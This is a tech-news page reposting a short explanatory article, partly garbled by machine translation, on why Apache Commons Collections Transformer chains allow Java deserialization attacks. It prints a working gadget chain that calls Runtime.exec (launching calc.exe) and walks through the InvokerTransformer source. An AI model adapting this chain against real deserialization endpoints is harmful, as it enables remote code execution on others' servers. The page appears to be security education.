In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-20 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
Java deserialization-the principle that the Transformer class can execute malicious code Transformer [] transformers = new Transformer [] {new ConstantTransformer (Runtime.class), new InvokerTransformer ("getMethod", new Class [] {String.class,Class [] .class}, new Object [] {"getRuntime", new Class [0]}), new InvokerTransformer ("invoke", new Class [] {Object.class,Object [] .class}) New Object [] {null, new Object [0]}), new InvokerTransformer ("exec", new Class [] {String.class}, new Object [] {"calc.exe",}),} Transformer transformerChain = new ChainedTransformer (transformers); ByteArrayOutputStream out = new ByteArrayOutputStream (); ObjectOutputStream objOut; try {objOut = new ObjectOutputStream (out); objOut.writeObject (transformerChain); transformerChain.transform (null);} catch (IOException e) {/ / TODO Auto-generated catch block e.printStackTrace ();}
Execution result:
Why can the 0x01 Transformer class execute malicious code?
TransformerChain.transform (null); executes the transform method of the ChainedTransformer class
Public Object transform (Object object) {for (int I = 0; I)
< iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object; } object = iTransformers[i].transform(object); 执行的是InvokerTransformer类的transform方法 public Object transform(Object input) { if (input == null) { return null; } try { Class cls = input.getClass(); Method method = cls.getMethod(iMethodName, iParamTypes); return method.invoke(input, iArgs); } catch (NoSuchMethodException ex) { throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist"); } catch (IllegalAccessException ex) { throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed"); } catch (InvocationTargetException ex) { throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex); } }
The reflection mechanism calls the getMethod method of runtime.class, then continues to call the invoke method to generate an object of runtime, and finally executes the exec method of the object, thus creating a deserialization vulnerability.
Please refer to:
0x03 supplement to https://blog.51cto.com/13770310/2159962
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
